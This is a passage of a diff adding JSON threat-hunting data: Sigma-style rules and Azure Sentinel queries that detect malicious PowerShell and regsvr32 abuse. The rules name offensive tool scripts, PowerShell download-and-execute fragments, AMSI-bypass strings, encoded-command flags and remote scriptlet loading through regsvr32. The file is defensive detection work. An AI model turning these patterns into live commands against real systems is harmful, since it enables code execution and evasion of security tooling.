+ "*\\Get-Screenshot.ps1", + "*\\Invoke-Inveigh.ps1", + "*\\Invoke-NetRipper.ps1", + "*\\Invoke-EgressCheck.ps1", + "*\\Invoke-PostExfil.ps1", + "*\\Invoke-PSInject.ps1", + "*\\Invoke-RunAs.ps1", + "*\\MailRaider.ps1", + "*\\New-HoneyHash.ps1", + "*\\Set-MacAttribute.ps1", + "*\\Invoke-DCSync.ps1", + "*\\Invoke-PowerDump.ps1", + "*\\Exploit-Jboss.ps1", + "*\\Invoke-ThunderStruck.ps1", + "*\\Invoke-VoiceTroll.ps1", + "*\\Set-Wallpaper.ps1", + "*\\Invoke-InveighRelay.ps1", + "*\\Invoke-PsExec.ps1", + "*\\Invoke-SSHCommand.ps1", + "*\\Get-SecurityPackages.ps1", + "*\\Install-SSP.ps1", + "*\\Invoke-BackdoorLNK.ps1", + "*\\PowerBreach.ps1", + "*\\Get-SiteListPassword.ps1", + "*\\Get-System.ps1", + "*\\Invoke-BypassUAC.ps1", + "*\\Invoke-Tater.ps1", + "*\\Invoke-WScriptBypassUAC.ps1", + "*\\PowerUp.ps1", + "*\\PowerView.ps1", + "*\\Get-RickAstley.ps1", + "*\\Find-Fruit.ps1", + "*\\HTTP-Login.ps1", + "*\\Find-TrustedDocuments.ps1", + "*\\Invoke-Paranoia.ps1", + "*\\Invoke-WinEnum.ps1", + "*\\Invoke-ARPScan.ps1", + "*\\Invoke-PortScan.ps1", + "*\\Invoke-ReverseDNSLookup.ps1", + "*\\Invoke-SMBScanner.ps1", + "*\\Invoke-Mimikittenz.ps1" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Penetration Tests" + ], + "level": "high" + }, + { + "title": "PowerShell Network Connections", + "id": "1f21ec3f-810d-4b0e-8045-322202e22b4b", + "status": "experimental", + "description": "Detects a Powershell process that opens network connections - check for suspicious target ports and target systems - adjust to your environment (e.g. extend filters with company's ip range')", + "author": "Florian Roth", + "references": [ + "https://www.youtube.com/watch?v=DLtJTxMWZ2o" + ], + "tags": [ + "attack.execution", + "attack.t1086" + ], + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection": { + "EventID": 3, + "Image": "*\\powershell.exe", + "Initiated": "true" + }, + "filter": { + "DestinationIp": [ + "10.*", + "192.168.*", + "172.16.*", + "172.17.*", + "172.18.*", + "172.19.*", + "172.20.*", + "172.21.*", + "172.22.*", + "172.23.*", + "172.24.*", + "172.25.*", + "172.26.*", + "172.27.*", + "172.28.*", + "172.29.*", + "172.30.*", + "172.31.*", + "127.0.0.1" + ], + "DestinationIsIpv6": "false", + "User": "NT AUTHORITY\\SYSTEM" + }, + "condition": "selection and not filter" + }, + "falsepositives": [ + "Administrative scripts" + ], + "level": "low" + }, + { + "title": "PowerShell Rundll32 Remote Thread Creation", + "id": "99b97608-3e21-4bfe-8217-2a127c396a0e", + "status": "experimental", + "description": "Detects PowerShell remote thread creation in Rundll32.exe", + "author": "Florian Roth", + "references": [ + "https://www.fireeye.com/blog/threat-research/2018/06/bring-your-own-land-novel-red-teaming-technique.html" + ], + "date": "2018/06/25", + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection": { + "EventID": 8, + "SourceImage": "*\\powershell.exe", + "TargetImage": "*\\rundll32.exe" + }, + "condition": "selection" + }, + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1085", + "attack.t1086" + ], + "falsepositives": [ + "Unkown" + ], + "level": "high" + }, + { + "title": "Suspicious Scripting in a WMI Consumer", + "id": "fe21810c-2a8c-478f-8dd3-5a287fb2a0e0", + "status": "experimental", + "description": "Detects suspicious scripting in WMI Event Consumers", + "author": "Florian Roth", + "references": [ + "https://in.security/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/", + "https://github.com/Neo23x0/signature-base/blob/master/yara/gen_susp_lnk_files.yar#L19" + ], + "date": "2019/04/15", + "tags": [ + "attack.t1086", + "attack.execution" + ], + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection": { + "EventID": 20, + "Destination": [ + "*new-object system.net.webclient).downloadstring(*", + "*new-object system.net.webclient).downloadfile(*", + "*new-object net.webclient).downloadstring(*", + "*new-object net.webclient).downloadfile(*", + "* iex(*", + "*WScript.shell*", + "* -nop *", + "* -noprofile *", + "* -decode *", + "* -enc *" + ] + }, + "condition": "selection" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "falsepositives": [ + "Administrative scripts" + ], + "level": "high" + }, + { + "title": "Powershell AMSI Bypass via .NET Reflection", + "id": "30edb182-aa75-42c0-b0a9-e998bb29067c", + "status": "experimental", + "description": "Detects Request to amsiInitFailed that can be used to disable AMSI Scanning", + "references": [ + "https://twitter.com/mattifestation/status/735261176745988096", + "https://www.hybrid-analysis.com/sample/0ced17419e01663a0cd836c9c2eb925e3031ffb5b18ccf35f4dea5d586d0203e?environmentId=120" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1086" + ], + "author": "Markus Neis", + "date": "2018/08/17", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection1": { + "CommandLine": [ + "*System.Management.Automation.AmsiUtils*" + ] + }, + "selection2": { + "CommandLine": [ + "*amsiInitFailed*" + ] + }, + "condition": "selection1 and selection2", + "falsepositives": [ + "Potential Admin Activity" + ] + }, + "level": "high" + }, + { + "title": "Detection of PowerShell Execution via DLL", + "id": "6812a10b-60ea-420c-832f-dfcc33b646ba", + "status": "experimental", + "description": "Detects PowerShell Strings applied to rundllas seen in PowerShdll.dll", + "references": [ + "https://github.com/p3nt4/PowerShdll/blob/master/README.md" + ], + "tags": [ + "attack.execution", + "attack.t1086", + "car.2014-04-003" + ], + "author": "Markus Neis", + "date": "2018/08/25", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection1": { + "Image": [ + "*\\rundll32.exe" + ] + }, + "selection2": { + "Description": [ + "*Windows-Hostprozess (Rundll32)*" + ] + }, + "selection3": { + "CommandLine": [ + "*Default.GetString*", + "*FromBase64String*" + ] + }, + "condition": "(selection1 or selection2) and selection3" + }, + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + { + "title": "PowerShell Download from URL", + "id": "3b6ab547-8ec2-4991-b9d2-2b06702a48d7", + "status": "experimental", + "description": "Detects a Powershell process that contains download commands in its command line string", + "author": "Florian Roth", + "tags": [ + "attack.t1086", + "attack.execution" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image": "*\\powershell.exe", + "CommandLine": [ + "*new-object system.net.webclient).downloadstring(*", + "*new-object system.net.webclient).downloadfile(*", + "*new-object net.webclient).downloadstring(*", + "*new-object net.webclient).downloadfile(*" + ] + }, + "condition": "selection" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "falsepositives": [ + "unknown" + ], + "level": "medium" + }, + { + "title": "Suspicious PowerShell Parameter Substring", + "id": "36210e0d-5b19-485d-a087-c096088885f0", + "status": "experimental", + "description": "Detects suspicious PowerShell invocation with a parameter substring", + "references": [ + "http://www.danielbohannon.com/blog-1/2017/3/12/powershell-execution-argument-obfuscation-how-it-can-make-detection-easier" + ], + "tags": [ + "attack.execution", + "attack.t1086" + ], + "author": "Florian Roth (rule), Daniel Bohannon (idea), Roberto Rodriguez (Fix)", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image": [ + "*\\Powershell.exe" + ], + "CommandLine": [ + " -windowstyle h ", + " -windowstyl h", + " -windowsty h", + " -windowst h", + " -windows h", + " -windo h", + " -wind h", + " -win h", + " -wi h", + " -win h ", + " -win hi ", + " -win hid ", + " -win hidd ", + " -win hidde ", + " -NoPr ", + " -NoPro ", + " -NoProf ", + " -NoProfi ", + " -NoProfil ", + " -nonin ", + " -nonint ", + " -noninte ", + " -noninter ", + " -nonintera ", + " -noninterac ", + " -noninteract ", + " -noninteracti ", + " -noninteractiv ", + " -ec ", + " -encodedComman ", + " -encodedComma ", + " -encodedComm ", + " -encodedCom ", + " -encodedCo ", + " -encodedC ", + " -encoded ", + " -encode ", + " -encod ", + " -enco ", + " -en " + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Penetration tests" + ], + "level": "high" + }, + { + "title": "Suspicious XOR Encoded PowerShell Command Line", + "id": "bb780e0c-16cf-4383-8383-1e5471db6cf9", + "description": "Detects suspicious powershell process which includes bxor command, alternatvide obfuscation method to b64 encoded commands.", + "status": "experimental", + "author": "Sami Ruohonen", + "date": "2018/09/05", + "tags": [ + "attack.execution", + "attack.t1086" + ], + "detection": { + "selection": { + "CommandLine": [ + "* -bxor*" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "unknown" + ], + "level": "medium", + "logsource": { + "category": "process_creation", + "product": "windows" + } + }, + { + "title": "Default PowerSploit and Empire Schtasks Persistence", + "id": "56c217c3-2de2-479b-990f-5c109ba8458f", + "status": "experimental", + "description": "Detects the creation of a schtask via PowerSploit or Empire Default Configuration.", + "references": [ + "https://github.com/0xdeadbeefJERKY/PowerSploit/blob/8690399ef70d2cad10213575ac67e8fa90ddf7c3/Persistence/Persistence.psm1", + "https://github.com/EmpireProject/Empire/blob/master/lib/modules/powershell/persistence/userland/schtasks.py", + "https://github.com/EmpireProject/Empire/blob/master/lib/modules/powershell/persistence/elevated/schtasks.py" + ], + "author": "Markus Neis, @Karneades", + "date": "2018/03/06", + "logsource": { + "product": "windows", + "category": "process_creation" + }, + "detection": { + "selection": { + "ParentImage": [ + "*\\powershell.exe" + ], + "CommandLine": [ + "*schtasks*/Create*/SC *ONLOGON*/TN *Updater*/TR *powershell*", + "*schtasks*/Create*/SC *DAILY*/TN *Updater*/TR *powershell*", + "*schtasks*/Create*/SC *ONIDLE*/TN *Updater*/TR *powershell*", + "*schtasks*/Create*/SC *Updater*/TN *Updater*/TR *powershell*" + ] + }, + "condition": "selection" + }, + "tags": [ + "attack.execution", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1053", + "attack.t1086", + "attack.s0111", + "attack.g0022", + "attack.g0060", + "car.2013-08-001" + ], + "falsepositives": [ + "False positives are possible, depends on organisation and processes" + ], + "level": "high" + }, + { + "title": "Empire PowerShell Launch Parameters", + "id": "79f4ede3-402e-41c8-bc3e-ebbf5f162581", + "description": "Detects suspicious powershell command line parameters used in Empire", + "status": "experimental", + "references": [ + "https://github.com/EmpireProject/Empire/blob/c2ba61ca8d2031dad0cfc1d5770ba723e8b710db/lib/common/helpers.py#L165", + "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/deaduser.py#L191", + "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/resolver.py#L178", + "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64" + ], + "author": "Florian Roth", + "date": "2019/04/20", + "tags": [ + "attack.execution", + "attack.t1086" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": [ + "* -NoP -sta -NonI -W Hidden -Enc *", + "* -noP -sta -w 1 -enc *", + "* -NoP -NonI -W Hidden -enc *" + ] + }, + "condition": "selection" + }, + "level": "critical" + }, + { + "title": "Suspicious Encoded PowerShell Command Line", + "id": "ca2092a1-c273-4878-9b4b-0d60115bf5ea", + "description": "Detects suspicious powershell process starts with base64 encoded commands", + "status": "experimental", + "references": [ + "https://app.any.run/tasks/6217d77d-3189-4db2-a957-8ab239f3e01e" + ], + "author": "Florian Roth, Markus Neis", + "date": "2018/09/03", + "modified": "2019/07/30", + "tags": [ + "attack.execution", + "attack.t1086" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": [ + "* -e JAB*", + "* -e JAB*", + "* -e JAB*", + "* -e JAB*", + "* -e JAB*", + "* -e JAB*", + "* -enc JAB*", + "* -enco JAB*", + "* -encodedcommand JAB*", + "* BA^J e-", + "* -e SUVYI*", + "* -e aWV4I*", + "* -e SQBFAFgA*", + "* -e aQBlAHgA*", + "* -enc SUVYI*", + "* -enc aWV4I*", + "* -enc SQBFAFgA*", + "* -enc aQBlAHgA*" + ] + }, + "falsepositive1": { + "CommandLine": "* -ExecutionPolicy remotesigned *" + }, + "condition": "selection and not falsepositive1" + }, + "level": "high" + }, + { + "title": "Malicious Base64 encoded PowerShell Keywords in command lines", + "id": "f26c6093-6f14-4b12-800f-0fcb46f5ffd0", + "status": "experimental", + "description": "Detects base64 encoded strings used in hidden malicious PowerShell command lines", + "references": [ + "http://www.leeholmes.com/blog/2017/09/21/searching-for-content-in-base-64-strings/" + ], + "tags": [ + "attack.execution", + "attack.t1086" + ], + "author": "John Lambert (rule)", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "encoded": { + "Image": "*\\powershell.exe", + "CommandLine": "* hidden *" + }, + "selection": { + "CommandLine": [ + "*AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA*", + "*aXRzYWRtaW4gL3RyYW5zZmVy*", + "*IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA*", + "*JpdHNhZG1pbiAvdHJhbnNmZX*", + "*YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg*", + "*Yml0c2FkbWluIC90cmFuc2Zlc*", + "*AGMAaAB1AG4AawBfAHMAaQB6AGUA*", + "*JABjAGgAdQBuAGsAXwBzAGkAegBlA*", + "*JGNodW5rX3Npem*", + "*QAYwBoAHUAbgBrAF8AcwBpAHoAZQ*", + "*RjaHVua19zaXpl*", + "*Y2h1bmtfc2l6Z*", + "*AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A*", + "*kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg*", + "*lPLkNvbXByZXNzaW9u*", + "*SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA*", + "*SU8uQ29tcHJlc3Npb2*", + "*Ty5Db21wcmVzc2lvb*", + "*AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ*", + "*kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA*", + "*lPLk1lbW9yeVN0cmVhb*", + "*SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A*", + "*SU8uTWVtb3J5U3RyZWFt*", + "*Ty5NZW1vcnlTdHJlYW*", + "*4ARwBlAHQAQwBoAHUAbgBrA*", + "*5HZXRDaHVua*", + "*AEcAZQB0AEMAaAB1AG4Aaw*", + "*LgBHAGUAdABDAGgAdQBuAGsA*", + "*LkdldENodW5r*", + "*R2V0Q2h1bm*", + "*AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A*", + "*QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA*", + "*RIUkVBRF9JTkZPNj*", + "*SFJFQURfSU5GTzY0*", + "*VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA*", + "*VEhSRUFEX0lORk82N*", + "*AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA*", + "*cmVhdGVSZW1vdGVUaHJlYW*", + "*MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA*", + "*NyZWF0ZVJlbW90ZVRocmVhZ*", + "*Q3JlYXRlUmVtb3RlVGhyZWFk*", + "*QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA*", + "*0AZQBtAG0AbwB2AGUA*", + "*1lbW1vdm*", + "*AGUAbQBtAG8AdgBlA*", + "*bQBlAG0AbQBvAHYAZQ*", + "*bWVtbW92Z*", + "*ZW1tb3Zl*" + ] + }, + "condition": "encoded and selection" + }, + "falsepositives": [ + "Penetration tests" + ], + "level": "high" + }, + { + "title": "Suspicious PowerShell Invocation based on Parent Process", + "id": "95eadcb2-92e4-4ed1-9031-92547773a6db", + "status": "experimental", + "description": "Detects suspicious powershell invocations from interpreters or unusual programs", + "author": "Florian Roth", + "references": [ + "https://www.carbonblack.com/2017/03/15/attackers-leverage-excel-powershell-dns-latest-non-malware-attack/" + ], + "tags": [ + "attack.execution", + "attack.t1086" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "ParentImage": [ + "*\\wscript.exe", + "*\\cscript.exe" + ], + "Image": [ + "*\\powershell.exe" + ] + }, + "falsepositive": { + "CurrentDirectory": "*\\Health Service State\\\\*" + }, + "condition": "selection and not falsepositive" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "falsepositives": [ + "Microsoft Operations Manager (MOM)", + "Other scripts" + ], + "level": "medium" + }, + { + "title": "PowerShell Script Run in AppData", + "id": "ac175779-025a-4f12-98b0-acdaeb77ea85", + "status": "experimental", + "description": "Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder", + "references": [ + "https://twitter.com/JohnLaTwC/status/1082851155481288706", + "https://app.any.run/tasks/f87f1c4e-47e2-4c46-9cf4-31454c06ce03" + ], + "tags": [ + "attack.execution", + "attack.t1086" + ], + "author": "Florian Roth", + "date": "2019/01/09", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": [ + "* /c powershell*\\AppData\\Local\\\\*", + "* /c powershell*\\AppData\\Roaming\\\\*" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Administrative scripts" + ], + "level": "medium" + }, + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4657", + "Windows Registry" + ], + [ + "4663", + "File monitoring" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4657", + "Windows Registry" + ], + [ + "4663", + "File monitoring" + ] + ], + "external_reference": [ + "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-Snatch-eng.pdf", + "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html", + "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", + "http://www.symantec.com/connect/blogs/forkmeiamfamous-seaduke-latest-weapon-duke-armory", + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", + "https://www.cybereason.com/blog/operation-cobalt-kitty-apt", + "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf", + "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html", + "http://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016", + "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + "http://blog.morphisec.com/fin7-attacks-restaurant-industry", + "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html", + "https://citizenlab.org/2016/05/stealth-falcon/", + "https://www.symantec.com/blogs/threat-intelligence/gallmaker-attack-group", + "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html", + "https://www.riskiq.com/blog/labs/cobalt-group-spear-phishing-russian-banks/", + "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin10.pdf", + "https://www.proofpoint.com/us/threat-insight/post/apt-targets-financial-analysts", + "http://researchcenter.paloaltonetworks.com/2017/04/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/", + "https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf", + "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group", + "https://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.html", + "https://www.us-cert.gov/ncas/alerts/TA17-293A", + "https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group", + "https://pan-unit42.github.io/playbook_viewer/", + "https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html", + "https://www.secureworks.com/research/bronze-union", + "https://www.group-ib.com/blog/cobalt", + "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html", + "https://blog.trendmicro.com/trendlabs-security-intelligence/another-potential-muddywater-campaign-uses-powershell-based-prb-backdoor/", + "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets", + "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/", + "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets", + "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/", + "https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "https://blog.crowdstrike.com/deep-thought-chinese-targeting-national-security-think-tanks/", + "https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-2017-eng.pdf", + "https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html", + "https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf", + "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html", + "https://securelist.com/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/73673/", + "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf", + "https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", + "https://www.welivesecurity.com/2018/05/22/turla-mosquito-shift-towards-generic-tools/", + "https://securelist.com/muddywater/88059/", + "https://github.com/PowerShellEmpire/Empire" + ] + }, + { + "technique_id": "T1117", + "command_list": [ + "excel.exe", + "regsvr32.exe", + "mshta.exe", + "odbcconf.exe", + "powerpoint.exe", + "reg32svr.exe", + "regsvr32.exe /i (http:|ftp:)", + "scrobj.dll", + "winword.exe", + "\\\\Windows\\\\.+\\\\regsvr32.exe/s|/i" + ], + "commands": [ + { + "command": "excel.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "regsvr32.exe", + "source": "Threat Hunting Tables", + "name": "sub_process_1" + }, + { + "command": "mshta.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "odbcconf.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "powerpoint.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "reg32svr.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "regsvr32.exe /i (http:|ftp:)", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "scrobj.dll", + "source": "Threat Hunting Tables", + "name": "loaded_dll" + }, + { + "command": "winword.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "\\\\Windows\\\\.+\\\\regsvr32.exe/s|/i", + "source": "SysmonHunter - Regsvr32", + "name": "" + } + ], + "parsed_datasets": [ + { + "chain_id": "100032", + "os": "windows", + "parent_process": "excel.exe", + "commandline_string": "", + "sub_process_1": "regsvr32.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "regsvr32", + "mitre_attack": "T1117", + "itw_sample": "" + }, + { + "chain_id": "100046", + "os": "windows", + "parent_process": "mshta.exe", + "commandline_string": "", + "sub_process_1": "regsvr32.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "regsvr32", + "mitre_attack": "T1117", + "itw_sample": "" + }, + { + "chain_id": "100055", + "os": "windows", + "parent_process": "odbcconf.exe", + "commandline_string": "", + "sub_process_1": "regsvr32.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "regsvr32", + "mitre_attack": "T1117", + "itw_sample": "ccb1fa5cdbc402b912b01a1838c1f13e95e9392b3ab6cc5f28277c012b0759f9" + }, + { + "chain_id": "100063", + "os": "windows", + "parent_process": "powerpoint.exe", + "commandline_string": "", + "sub_process_1": "regsvr32.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "regsvr32", + "mitre_attack": "T1117", + "itw_sample": "" + }, + { + "chain_id": "100069", + "os": "windows", + "parent_process": "reg32svr.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "", + "mitre_attack": "T1117", + "itw_sample": "" + }, + { + "chain_id": "100070", + "os": "windows", + "parent_process": "regsvr32.exe", + "commandline_string": "/i (http:|ftp:)", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "scrobj.dll", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "reg32svr", + "mitre_attack": "T1117", + "itw_sample": "" + }, + { + "chain_id": "100095", + "os": "windows", + "parent_process": "winword.exe", + "commandline_string": "", + "sub_process_1": "regsvr32.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "regsvr32", + "mitre_attack": "T1117", + "itw_sample": "" + }, + { + "name": "Regsvr32", + "description": null, + "level": "medium", + "phase": "Execution", + "query": [ + { + "type": "process", + "process": { + "image": { + "pattern": "\\\\Windows\\\\.+\\\\regsvr32.exe", + "flag": "regex" + }, + "cmdline": { + "pattern": "/s|/i", + "op": "and" + } + } + } + ] + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and (process_path contains \"regsvr32.exe\"or process_path contains \"rundll32.exe\"or process_path contains \"certutil.exe\")or process_command_line contains \"scrobj.dll\"", + "name": "Bypassing Application Whitelisting With Regsvr32" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 3 and (process_parent_path contains \"\\\\regsvr32.exe\"or process_path contains \"\\\\regsvr32.exe\")", + "name": "Regsvr32 Network" + } + ], + "possible_detections": [ + { + "title": "BlueMashroom DLL Load", + "id": "bd70d3f8-e60e-4d25-89f0-0b5a9cff20e0", + "status": "experimental", + "description": "Detects a suspicious DLL loading from AppData Local path as described in BlueMashroom report", + "references": [ + "https://www.virusbulletin.com/conference/vb2019/abstracts/apt-cases-exploiting-vulnerabilities-region-specific-software" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1117" + ], + "author": "Florian Roth", + "date": "2019/10/02", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": [ + "*\\regsvr32*\\AppData\\Local\\\\*", + "*\\AppData\\Local\\\\*,DllEntry*" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Unlikely" + ], + "level": "critical" + }, + { + "title": "Regsvr32 Anomaly", + "id": "8e2b24c9-4add-46a0-b4bb-0057b4e6187d", + "status": "experimental", + "description": "Detects various anomalies in relation to regsvr32.exe", + "author": "Florian Roth", + "references": [ + "https://subt0x10.blogspot.de/2017/04/bypass-application-whitelisting-script.html" + ], + "tags": [ + "attack.t1117", + "attack.defense_evasion", + "attack.execution", + "car.2019-04-002", + "car.2019-04-003" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection1": { + "Image": "*\\regsvr32.exe", + "CommandLine": "*\\Temp\\\\*" + }, + "selection2": { + "Image": "*\\regsvr32.exe", + "ParentImage": "*\\powershell.exe" + }, + "selection3": { + "Image": "*\\regsvr32.exe", + "CommandLine": [ + "*/i:http* scrobj.dll", + "*/i:ftp* scrobj.dll" + ] + }, + "selection4": { + "Image": "*\\wscript.exe", + "ParentImage": "*\\regsvr32.exe" + }, + "selection5": { + "Image": "*\\EXCEL.EXE", + "CommandLine": "*..\\..\\..\\Windows\\System32\\regsvr32.exe *" + }, + "condition": "1 of them" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "ID - 7", + "Sysmon", + "Loaded DLLs" + ], + [ + "4657", + "Windows Registry" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "Sysmon - ID 7", + "Loaded DLLs" + ], + [ + "4657", + "Windows Registry" + ] + ], + "external_reference": [ + "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", + "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html", + "https://blog.morphisec.com/cobalt-gang-2.0", + 